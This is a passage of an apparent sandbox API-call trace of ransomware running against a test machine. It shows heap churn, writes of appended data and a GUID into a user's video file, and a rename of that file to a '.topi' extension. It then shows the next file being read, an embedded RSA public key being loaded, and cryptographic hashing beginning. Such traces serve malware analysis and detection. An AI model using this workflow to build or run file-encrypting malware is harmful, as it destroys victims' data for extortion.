dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb9f8 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fa0 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fba40 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fb8 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fe8 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5000 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.834] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.834] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5000 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5000 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4fe8 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5000 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.835] GetCurrentThreadId () returned 0x8c4 [0097.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa3d0 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.836] GetCurrentThreadId () returned 0x8c4 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.836] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fe8 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5000 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fd0 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5018 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0097.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.837] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fe8 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fe8 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5018 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5000 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fd0 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fb8 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fba40 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.840] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x124e6, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x124e6, lpOverlapped=0x0) returned 1 [0097.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.841] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x124eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.841] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.841] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.841] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.842] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.842] CloseHandle (hObject=0x6a8) returned 1 [0097.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ed08 [0097.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0097.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ed08 | out: hHeap=0x680000) returned 1 [0097.843] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Cas9.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\cas9.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\Cas9.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\cas9.flv.topi")) returned 1 [0097.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.844] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.846] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f6cbd10, ftCreationTime.dwHighDateTime=0x1d5b7a7, ftLastAccessTime.dwLowDateTime=0xabbf3d0, ftLastAccessTime.dwHighDateTime=0x1d5c4a7, ftLastWriteTime.dwLowDateTime=0xabbf3d0, ftLastWriteTime.dwHighDateTime=0x1d5c4a7, nFileSizeHigh=0x0, nFileSizeLow=0xcb88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FCmit-LXZwDBRjcC_u d.mp4", cAlternateFileName="FCMIT-~1.MP4")) returned 1 [0097.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f248 [0097.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0097.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f248 | out: hHeap=0x680000) returned 1 [0097.847] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\FCmit-LXZwDBRjcC_u d.mp4") returned=".mp4" [0097.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\FCmit-LXZwDBRjcC_u d.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\fcmit-lxzwdbrjcc_u d.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.847] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=52104) returned 1 [0097.847] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.853] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xcb62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.853] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.854] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.854] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xcb88, lpOverlapped=0x0) returned 1 [0097.854] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.855] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.855] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.856] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.856] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.856] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, 